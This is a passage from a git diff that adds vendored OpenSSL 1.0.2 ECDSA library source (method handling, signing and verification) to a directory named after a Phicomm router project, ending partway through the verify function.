+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <string.h>
+#include "ecs_locl.h"
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+#include <openssl/err.h>
+#include <openssl/bn.h>
+#ifdef OPENSSL_FIPS
+# include <openssl/fips.h>
+#endif
+
+const char ECDSA_version[] = "ECDSA" OPENSSL_VERSION_PTEXT;
+
+static const ECDSA_METHOD *default_ECDSA_method = NULL;
+
+static void *ecdsa_data_new(void);
+static void *ecdsa_data_dup(void *);
+static void ecdsa_data_free(void *);
+
+void ECDSA_set_default_method(const ECDSA_METHOD *meth)
+{
+    default_ECDSA_method = meth;
+}
+
+const ECDSA_METHOD *ECDSA_get_default_method(void)
+{
+    if (!default_ECDSA_method) {
+#ifdef OPENSSL_FIPS
+        if (FIPS_mode())
+            return FIPS_ecdsa_openssl();
+        else
+            return ECDSA_OpenSSL();
+#else
+        default_ECDSA_method = ECDSA_OpenSSL();
+#endif
+    }
+    return default_ECDSA_method;
+}
+
+int ECDSA_set_method(EC_KEY *eckey, const ECDSA_METHOD *meth)
+{
+    ECDSA_DATA *ecdsa;
+
+    ecdsa = ecdsa_check(eckey);
+
+    if (ecdsa == NULL)
+        return 0;
+
+#ifndef OPENSSL_NO_ENGINE
+    if (ecdsa->engine) {
+        ENGINE_finish(ecdsa->engine);
+        ecdsa->engine = NULL;
+    }
+#endif
+    ecdsa->meth = meth;
+
+    return 1;
+}
+
+static ECDSA_DATA *ECDSA_DATA_new_method(ENGINE *engine)
+{
+    ECDSA_DATA *ret;
+
+    ret = (ECDSA_DATA *)OPENSSL_malloc(sizeof(ECDSA_DATA));
+    if (ret == NULL) {
+        ECDSAerr(ECDSA_F_ECDSA_DATA_NEW_METHOD, ERR_R_MALLOC_FAILURE);
+        return (NULL);
+    }
+
+    ret->init = NULL;
+
+    ret->meth = ECDSA_get_default_method();
+    ret->engine = engine;
+#ifndef OPENSSL_NO_ENGINE
+    if (!ret->engine)
+        ret->engine = ENGINE_get_default_ECDSA();
+    if (ret->engine) {
+        ret->meth = ENGINE_get_ECDSA(ret->engine);
+        if (!ret->meth) {
+            ECDSAerr(ECDSA_F_ECDSA_DATA_NEW_METHOD, ERR_R_ENGINE_LIB);
+            ENGINE_finish(ret->engine);
+            OPENSSL_free(ret);
+            return NULL;
+        }
+    }
+#endif
+
+    ret->flags = ret->meth->flags;
+    CRYPTO_new_ex_data(CRYPTO_EX_INDEX_ECDSA, ret, &ret->ex_data);
+#if 0
+    if ((ret->meth->init != NULL) && !ret->meth->init(ret)) {
+        CRYPTO_free_ex_data(CRYPTO_EX_INDEX_ECDSA, ret, &ret->ex_data);
+        OPENSSL_free(ret);
+        ret = NULL;
+    }
+#endif
+    return (ret);
+}
+
+static void *ecdsa_data_new(void)
+{
+    return (void *)ECDSA_DATA_new_method(NULL);
+}
+
+static void *ecdsa_data_dup(void *data)
+{
+    ECDSA_DATA *r = (ECDSA_DATA *)data;
+
+    /* XXX: dummy operation */
+    if (r == NULL)
+        return NULL;
+
+    return ecdsa_data_new();
+}
+
+static void ecdsa_data_free(void *data)
+{
+    ECDSA_DATA *r = (ECDSA_DATA *)data;
+
+#ifndef OPENSSL_NO_ENGINE
+    if (r->engine)
+        ENGINE_finish(r->engine);
+#endif
+    CRYPTO_free_ex_data(CRYPTO_EX_INDEX_ECDSA, r, &r->ex_data);
+
+    OPENSSL_cleanse((void *)r, sizeof(ECDSA_DATA));
+
+    OPENSSL_free(r);
+}
+
+ECDSA_DATA *ecdsa_check(EC_KEY *key)
+{
+    ECDSA_DATA *ecdsa_data;
+
+    void *data = EC_KEY_get_key_method_data(key, ecdsa_data_dup,
+                                            ecdsa_data_free, ecdsa_data_free);
+    if (data == NULL) {
+        ecdsa_data = (ECDSA_DATA *)ecdsa_data_new();
+        if (ecdsa_data == NULL)
+            return NULL;
+        data = EC_KEY_insert_key_method_data(key, (void *)ecdsa_data,
+                                             ecdsa_data_dup, ecdsa_data_free,
+                                             ecdsa_data_free);
+        if (data != NULL) {
+            /*
+             * Another thread raced us to install the key_method data and
+             * won.
+             */
+            ecdsa_data_free(ecdsa_data);
+            ecdsa_data = (ECDSA_DATA *)data;
+        }
+    } else
+        ecdsa_data = (ECDSA_DATA *)data;
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode() && !(ecdsa_data->flags & ECDSA_FLAG_FIPS_METHOD)
+        && !(EC_KEY_get_flags(key) & EC_FLAG_NON_FIPS_ALLOW)) {
+        ECDSAerr(ECDSA_F_ECDSA_CHECK, ECDSA_R_NON_FIPS_METHOD);
+        return NULL;
+    }
+#endif
+
+    return ecdsa_data;
+}
+
+int ECDSA_size(const EC_KEY *r)
+{
+    int ret, i;
+    ASN1_INTEGER bs;
+    BIGNUM *order = NULL;
+    unsigned char buf[4];
+    const EC_GROUP *group;
+
+    if (r == NULL)
+        return 0;
+    group = EC_KEY_get0_group(r);
+    if (group == NULL)
+        return 0;
+
+    if ((order = BN_new()) == NULL)
+        return 0;
+    if (!EC_GROUP_get_order(group, order, NULL)) {
+        BN_clear_free(order);
+        return 0;
+    }
+    i = BN_num_bits(order);
+    bs.length = (i + 7) / 8;
+    bs.data = buf;
+    bs.type = V_ASN1_INTEGER;
+    /* If the top bit is set the asn1 encoding is 1 larger. */
+    buf[0] = 0xff;
+
+    i = i2d_ASN1_INTEGER(&bs, NULL);
+    i += i;                     /* r and s */
+    ret = ASN1_object_size(1, i, V_ASN1_SEQUENCE);
+    BN_clear_free(order);
+    return (ret);
+}
+
+int ECDSA_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
+                           CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func)
+{
+    return CRYPTO_get_ex_new_index(CRYPTO_EX_INDEX_ECDSA, argl, argp,
+                                   new_func, dup_func, free_func);
+}
+
+int ECDSA_set_ex_data(EC_KEY *d, int idx, void *arg)
+{
+    ECDSA_DATA *ecdsa;
+    ecdsa = ecdsa_check(d);
+    if (ecdsa == NULL)
+        return 0;
+    return (CRYPTO_set_ex_data(&ecdsa->ex_data, idx, arg));
+}
+
+void *ECDSA_get_ex_data(EC_KEY *d, int idx)
+{
+    ECDSA_DATA *ecdsa;
+    ecdsa = ecdsa_check(d);
+    if (ecdsa == NULL)
+        return NULL;
+    return (CRYPTO_get_ex_data(&ecdsa->ex_data, idx));
+}
+
+ECDSA_METHOD *ECDSA_METHOD_new(ECDSA_METHOD *ecdsa_meth)
+{
+    ECDSA_METHOD *ret;
+
+    ret = OPENSSL_malloc(sizeof(ECDSA_METHOD));
+    if (ret == NULL) {
+        ECDSAerr(ECDSA_F_ECDSA_METHOD_NEW, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+
+    if (ecdsa_meth)
+        *ret = *ecdsa_meth;
+    else {
+        ret->ecdsa_sign_setup = 0;
+        ret->ecdsa_do_sign = 0;
+        ret->ecdsa_do_verify = 0;
+        ret->name = NULL;
+        ret->flags = 0;
+    }
+    ret->flags |= ECDSA_METHOD_FLAG_ALLOCATED;
+    return ret;
+}
+
+void ECDSA_METHOD_set_sign(ECDSA_METHOD *ecdsa_method,
+                           ECDSA_SIG *(*ecdsa_do_sign) (const unsigned char
+                                                        *dgst, int dgst_len,
+                                                        const BIGNUM *inv,
+                                                        const BIGNUM *rp,
+                                                        EC_KEY *eckey))
+{
+    ecdsa_method->ecdsa_do_sign = ecdsa_do_sign;
+}
+
+void ECDSA_METHOD_set_sign_setup(ECDSA_METHOD *ecdsa_method,
+                                 int (*ecdsa_sign_setup) (EC_KEY *eckey,
+                                                          BN_CTX *ctx,
+                                                          BIGNUM **kinv,
+                                                          BIGNUM **r))
+{
+    ecdsa_method->ecdsa_sign_setup = ecdsa_sign_setup;
+}
+
+void ECDSA_METHOD_set_verify(ECDSA_METHOD *ecdsa_method,
+                             int (*ecdsa_do_verify) (const unsigned char
+                                                     *dgst, int dgst_len,
+                                                     const ECDSA_SIG *sig,
+                                                     EC_KEY *eckey))
+{
+    ecdsa_method->ecdsa_do_verify = ecdsa_do_verify;
+}
+
+void ECDSA_METHOD_set_flags(ECDSA_METHOD *ecdsa_method, int flags)
+{
+    ecdsa_method->flags = flags | ECDSA_METHOD_FLAG_ALLOCATED;
+}
+
+void ECDSA_METHOD_set_name(ECDSA_METHOD *ecdsa_method, char *name)
+{
+    ecdsa_method->name = name;
+}
+
+void ECDSA_METHOD_free(ECDSA_METHOD *ecdsa_method)
+{
+    if (ecdsa_method->flags & ECDSA_METHOD_FLAG_ALLOCATED)
+        OPENSSL_free(ecdsa_method);
+}
+
+void ECDSA_METHOD_set_app_data(ECDSA_METHOD *ecdsa_method, void *app)
+{
+    ecdsa_method->app_data = app;
+}
+
+void *ECDSA_METHOD_get_app_data(ECDSA_METHOD *ecdsa_method)
+{
+    return ecdsa_method->app_data;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecs_locl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecs_locl.h
new file mode 100644
index 0000000..d3a5efc
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecs_locl.h
@@ -0,0 +1,120 @@
+/* crypto/ecdsa/ecs_locl.h */
+/*
+ * Written by Nils Larsch for the OpenSSL project
+ */
+/* ====================================================================
+ * Copyright (c) 2000-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_ECS_LOCL_H
+# define HEADER_ECS_LOCL_H
+
+# include <openssl/ecdsa.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+struct ecdsa_method {
+    const char *name;
+    ECDSA_SIG *(*ecdsa_do_sign) (const unsigned char *dgst, int dgst_len,
+                                 const BIGNUM *inv, const BIGNUM *rp,
+                                 EC_KEY *eckey);
+    int (*ecdsa_sign_setup) (EC_KEY *eckey, BN_CTX *ctx, BIGNUM **kinv,
+                             BIGNUM **r);
+    int (*ecdsa_do_verify) (const unsigned char *dgst, int dgst_len,
+                            const ECDSA_SIG *sig, EC_KEY *eckey);
+# if 0
+    int (*init) (EC_KEY *eckey);
+    int (*finish) (EC_KEY *eckey);
+# endif
+    int flags;
+    void *app_data;
+};
+
+/* The ECDSA_METHOD was allocated and can be freed */
+
+# define ECDSA_METHOD_FLAG_ALLOCATED 0x2
+
+/*
+ * If this flag is set the ECDSA method is FIPS compliant and can be used in
+ * FIPS mode. This is set in the validated module method. If an application
+ * sets this flag in its own methods it is its responsibility to ensure the
+ * result is compliant.
+ */
+
+# define ECDSA_FLAG_FIPS_METHOD  0x1
+
+typedef struct ecdsa_data_st {
+    /* EC_KEY_METH_DATA part */
+    int (*init) (EC_KEY *);
+    /* method (ECDSA) specific part */
+    ENGINE *engine;
+    int flags;
+    const ECDSA_METHOD *meth;
+    CRYPTO_EX_DATA ex_data;
+} ECDSA_DATA;
+
+/** ecdsa_check
+ * checks whether ECKEY->meth_data is a pointer to a ECDSA_DATA structure
+ * and if not it removes the old meth_data and creates a ECDSA_DATA structure.
+ * \param  eckey pointer to a EC_KEY object
+ * \return pointer to a ECDSA_DATA structure
+ */
+ECDSA_DATA *ecdsa_check(EC_KEY *eckey);
+
+#ifdef  __cplusplus
+}
+#endif
+
+#endif                          /* HEADER_ECS_LOCL_H */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecs_ossl.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecs_ossl.c
new file mode 100644
index 0000000..dd76960
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecs_ossl.c
@@ -0,0 +1,464 @@
+/* crypto/ecdsa/ecs_ossl.c */
+/*
+ * Written by Nils Larsch for the OpenSSL project
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2004 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "ecs_locl.h"
+#include <openssl/err.h>
+#include <openssl/obj_mac.h>
+#include <openssl/bn.h>
+
+static ECDSA_SIG *ecdsa_do_sign(const unsigned char *dgst, int dlen,
+                                const BIGNUM *, const BIGNUM *,
+                                EC_KEY *eckey);
+static int ecdsa_sign_setup(EC_KEY *eckey, BN_CTX *ctx_in, BIGNUM **kinvp,
+                            BIGNUM **rp);
+static int ecdsa_do_verify(const unsigned char *dgst, int dgst_len,
+                           const ECDSA_SIG *sig, EC_KEY *eckey);
+
+static ECDSA_METHOD openssl_ecdsa_meth = {
+    "OpenSSL ECDSA method",
+    ecdsa_do_sign,
+    ecdsa_sign_setup,
+    ecdsa_do_verify,
+#if 0
+    NULL,                       /* init */
+    NULL,                       /* finish */
+#endif
+    0,                          /* flags */
+    NULL                        /* app_data */
+};
+
+const ECDSA_METHOD *ECDSA_OpenSSL(void)
+{
+    return &openssl_ecdsa_meth;
+}
+
+static int ecdsa_sign_setup(EC_KEY *eckey, BN_CTX *ctx_in, BIGNUM **kinvp,
+                            BIGNUM **rp)
+{
+    BN_CTX *ctx = NULL;
+    BIGNUM *k = NULL, *r = NULL, *order = NULL, *X = NULL;
+    EC_POINT *tmp_point = NULL;
+    const EC_GROUP *group;
+    int ret = 0;
+
+    if (eckey == NULL || (group = EC_KEY_get0_group(eckey)) == NULL) {
+        ECDSAerr(ECDSA_F_ECDSA_SIGN_SETUP, ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+
+    if (ctx_in == NULL) {
+        if ((ctx = BN_CTX_new()) == NULL) {
+            ECDSAerr(ECDSA_F_ECDSA_SIGN_SETUP, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+    } else
+        ctx = ctx_in;
+
+    k = BN_new();               /* this value is later returned in *kinvp */
+    r = BN_new();               /* this value is later returned in *rp */
+    order = BN_new();
+    X = BN_new();
+    if (!k || !r || !order || !X) {
+        ECDSAerr(ECDSA_F_ECDSA_SIGN_SETUP, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    if ((tmp_point = EC_POINT_new(group)) == NULL) {
+        ECDSAerr(ECDSA_F_ECDSA_SIGN_SETUP, ERR_R_EC_LIB);
+        goto err;
+    }
+    if (!EC_GROUP_get_order(group, order, ctx)) {
+        ECDSAerr(ECDSA_F_ECDSA_SIGN_SETUP, ERR_R_EC_LIB);
+        goto err;
+    }
+
+    do {
+        /* get random k */
+        do
+            if (!BN_rand_range(k, order)) {
+                ECDSAerr(ECDSA_F_ECDSA_SIGN_SETUP,
+                         ECDSA_R_RANDOM_NUMBER_GENERATION_FAILED);
+                goto err;
+            }
+        while (BN_is_zero(k)) ;
+
+        /*
+         * We do not want timing information to leak the length of k, so we
+         * compute G*k using an equivalent scalar of fixed bit-length.
+         */
+
+        if (!BN_add(k, k, order))
+            goto err;
+        if (BN_num_bits(k) <= BN_num_bits(order))
+            if (!BN_add(k, k, order))
+                goto err;
+
+        /* compute r the x-coordinate of generator * k */
+        if (!EC_POINT_mul(group, tmp_point, k, NULL, NULL, ctx)) {
+            ECDSAerr(ECDSA_F_ECDSA_SIGN_SETUP, ERR_R_EC_LIB);
+            goto err;
+        }
+        if (EC_METHOD_get_field_type(EC_GROUP_method_of(group)) ==
+            NID_X9_62_prime_field) {
+            if (!EC_POINT_get_affine_coordinates_GFp
+                (group, tmp_point, X, NULL, ctx)) {
+                ECDSAerr(ECDSA_F_ECDSA_SIGN_SETUP, ERR_R_EC_LIB);
+                goto err;
+            }
+        }
+#ifndef OPENSSL_NO_EC2M
+        else {                  /* NID_X9_62_characteristic_two_field */
+
+            if (!EC_POINT_get_affine_coordinates_GF2m(group,
+                                                      tmp_point, X, NULL,
+                                                      ctx)) {
+                ECDSAerr(ECDSA_F_ECDSA_SIGN_SETUP, ERR_R_EC_LIB);
+                goto err;
+            }
+        }
+#endif
+        if (!BN_nnmod(r, X, order, ctx)) {
+            ECDSAerr(ECDSA_F_ECDSA_SIGN_SETUP, ERR_R_BN_LIB);
+            goto err;
+        }
+    }
+    while (BN_is_zero(r));
+
+    /* compute the inverse of k */
+    if (EC_GROUP_get_mont_data(group) != NULL) {
+        /*
+         * We want inverse in constant time, therefore we utilize the fact
+         * order must be prime and use Fermats Little Theorem instead.
+         */
+        if (!BN_set_word(X, 2)) {
+            ECDSAerr(ECDSA_F_ECDSA_SIGN_SETUP, ERR_R_BN_LIB);
+            goto err;
+        }
+        if (!BN_mod_sub(X, order, X, order, ctx)) {
+            ECDSAerr(ECDSA_F_ECDSA_SIGN_SETUP, ERR_R_BN_LIB);
+            goto err;
+        }
+        BN_set_flags(X, BN_FLG_CONSTTIME);
+        if (!BN_mod_exp_mont_consttime
+            (k, k, X, order, ctx, EC_GROUP_get_mont_data(group))) {
+            ECDSAerr(ECDSA_F_ECDSA_SIGN_SETUP, ERR_R_BN_LIB);
+            goto err;
+        }
+    } else {
+        if (!BN_mod_inverse(k, k, order, ctx)) {
+            ECDSAerr(ECDSA_F_ECDSA_SIGN_SETUP, ERR_R_BN_LIB);
+            goto err;
+        }
+    }
+
+    /* clear old values if necessary */
+    if (*rp != NULL)
+        BN_clear_free(*rp);
+    if (*kinvp != NULL)
+        BN_clear_free(*kinvp);
+    /* save the pre-computed values  */
+    *rp = r;
+    *kinvp = k;
+    ret = 1;
+ err:
+    if (!ret) {
+        if (k != NULL)
+            BN_clear_free(k);
+        if (r != NULL)
+            BN_clear_free(r);
+    }
+    if (ctx_in == NULL)
+        BN_CTX_free(ctx);
+    if (order != NULL)
+        BN_free(order);
+    if (tmp_point != NULL)
+        EC_POINT_free(tmp_point);
+    if (X)
+        BN_clear_free(X);
+    return (ret);
+}
+
+static ECDSA_SIG *ecdsa_do_sign(const unsigned char *dgst, int dgst_len,
+                                const BIGNUM *in_kinv, const BIGNUM *in_r,
+                                EC_KEY *eckey)
+{
+    int ok = 0, i;
+    BIGNUM *kinv = NULL, *s, *m = NULL, *tmp = NULL, *order = NULL;
+    const BIGNUM *ckinv;
+    BN_CTX *ctx = NULL;
+    const EC_GROUP *group;
+    ECDSA_SIG *ret;
+    ECDSA_DATA *ecdsa;
+    const BIGNUM *priv_key;
+
+    ecdsa = ecdsa_check(eckey);
+    group = EC_KEY_get0_group(eckey);
+    priv_key = EC_KEY_get0_private_key(eckey);
+
+    if (group == NULL || priv_key == NULL || ecdsa == NULL) {
+        ECDSAerr(ECDSA_F_ECDSA_DO_SIGN, ERR_R_PASSED_NULL_PARAMETER);
+        return NULL;
+    }
+
+    ret = ECDSA_SIG_new();
+    if (!ret) {
+        ECDSAerr(ECDSA_F_ECDSA_DO_SIGN, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    s = ret->s;
+
+    if ((ctx = BN_CTX_new()) == NULL || (order = BN_new()) == NULL ||
+        (tmp = BN_new()) == NULL || (m = BN_new()) == NULL) {
+        ECDSAerr(ECDSA_F_ECDSA_DO_SIGN, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    if (!EC_GROUP_get_order(group, order, ctx)) {
+        ECDSAerr(ECDSA_F_ECDSA_DO_SIGN, ERR_R_EC_LIB);
+        goto err;
+    }
+    i = BN_num_bits(order);
+    /*
+     * Need to truncate digest if it is too long: first truncate whole bytes.
+     */
+    if (8 * dgst_len > i)
+        dgst_len = (i + 7) / 8;
+    if (!BN_bin2bn(dgst, dgst_len, m)) {
+        ECDSAerr(ECDSA_F_ECDSA_DO_SIGN, ERR_R_BN_LIB);
+        goto err;
+    }
+    /* If still too long truncate remaining bits with a shift */
+    if ((8 * dgst_len > i) && !BN_rshift(m, m, 8 - (i & 0x7))) {
+        ECDSAerr(ECDSA_F_ECDSA_DO_SIGN, ERR_R_BN_LIB);
+        goto err;
+    }
+    do {
+        if (in_kinv == NULL || in_r == NULL) {
+            if (!ECDSA_sign_setup(eckey, ctx, &kinv, &ret->r)) {
+                ECDSAerr(ECDSA_F_ECDSA_DO_SIGN, ERR_R_ECDSA_LIB);
+                goto err;
+            }
+            ckinv = kinv;
+        } else {
+            ckinv = in_kinv;
+            if (BN_copy(ret->r, in_r) == NULL) {
+                ECDSAerr(ECDSA_F_ECDSA_DO_SIGN, ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+        }
+
+        if (!BN_mod_mul(tmp, priv_key, ret->r, order, ctx)) {
+            ECDSAerr(ECDSA_F_ECDSA_DO_SIGN, ERR_R_BN_LIB);
+            goto err;
+        }
+        if (!BN_mod_add_quick(s, tmp, m, order)) {
+            ECDSAerr(ECDSA_F_ECDSA_DO_SIGN, ERR_R_BN_LIB);
+            goto err;
+        }
+        if (!BN_mod_mul(s, s, ckinv, order, ctx)) {
+            ECDSAerr(ECDSA_F_ECDSA_DO_SIGN, ERR_R_BN_LIB);
+            goto err;
+        }
+        if (BN_is_zero(s)) {
+            /*
+             * if kinv and r have been supplied by the caller don't to
+             * generate new kinv and r values
+             */
+            if (in_kinv != NULL && in_r != NULL) {
+                ECDSAerr(ECDSA_F_ECDSA_DO_SIGN,
+                         ECDSA_R_NEED_NEW_SETUP_VALUES);
+                goto err;
+            }
+        } else
+            /* s != 0 => we have a valid signature */
+            break;
+    }
+    while (1);
+
+    ok = 1;
+ err:
+    if (!ok) {
+        ECDSA_SIG_free(ret);
+        ret = NULL;
+    }
+    if (ctx)
+        BN_CTX_free(ctx);
+    if (m)
+        BN_clear_free(m);
+    if (tmp)
+        BN_clear_free(tmp);
+    if (order)
+        BN_free(order);
+    if (kinv)
+        BN_clear_free(kinv);
+    return ret;
+}
+
+static int ecdsa_do_verify(const unsigned char *dgst, int dgst_len,
+                           const ECDSA_SIG *sig, EC_KEY *eckey)
+{
+    int ret = -1, i;
+    BN_CTX *ctx;
+    BIGNUM *order, *u1, *u2, *m, *X;
+    EC_POINT *point = NULL;
+    const EC_GROUP *group;
+    const EC_POINT *pub_key;
+
+    /* check input values */
+    if (eckey == NULL || (group = EC_KEY_get0_group(eckey)) == NULL ||
+        (pub_key = EC_KEY_get0_public_key(eckey)) == NULL || sig == NULL) {
+        ECDSAerr(ECDSA_F_ECDSA_DO_VERIFY, ECDSA_R_MISSING_PARAMETERS);
+        return -1;
+    }
+
+    ctx = BN_CTX_new();
+    if (!ctx) {
+        ECDSAerr(ECDSA_F_ECDSA_DO_VERIFY, ERR_R_MALLOC_FAILURE);
+        return -1;
+    }
+    BN_CTX_start(ctx);
+    order = BN_CTX_get(ctx);
+    u1 = BN_CTX_get(ctx);
+    u2 = BN_CTX_get(ctx);
+    m = BN_CTX_get(ctx);
+    X = BN_CTX_get(ctx);
+    if (!X) {
+        ECDSAerr(ECDSA_F_ECDSA_DO_VERIFY, ERR_R_BN_LIB);
+        goto err;
+    }
+
+    if (!EC_GROUP_get_order(group, order, ctx)) {
+        ECDSAerr(ECDSA_F_ECDSA_DO_VERIFY, ERR_R_EC_LIB);
+        goto err;
+    }
+
+    if (BN_is_zero(sig->r) || BN_is_negative(sig->r) ||
+        BN_ucmp(sig->r, order) >= 0 || BN_is_zero(sig->s) ||
+        BN_is_negative(sig->s) || BN_ucmp(sig->s, order) >= 0) {
+        ECDSAerr(ECDSA_F_ECDSA_DO_VERIFY, ECDSA_R_BAD_SIGNATURE);
+        ret = 0;                /* signature is invalid */
+        goto err;
+    }
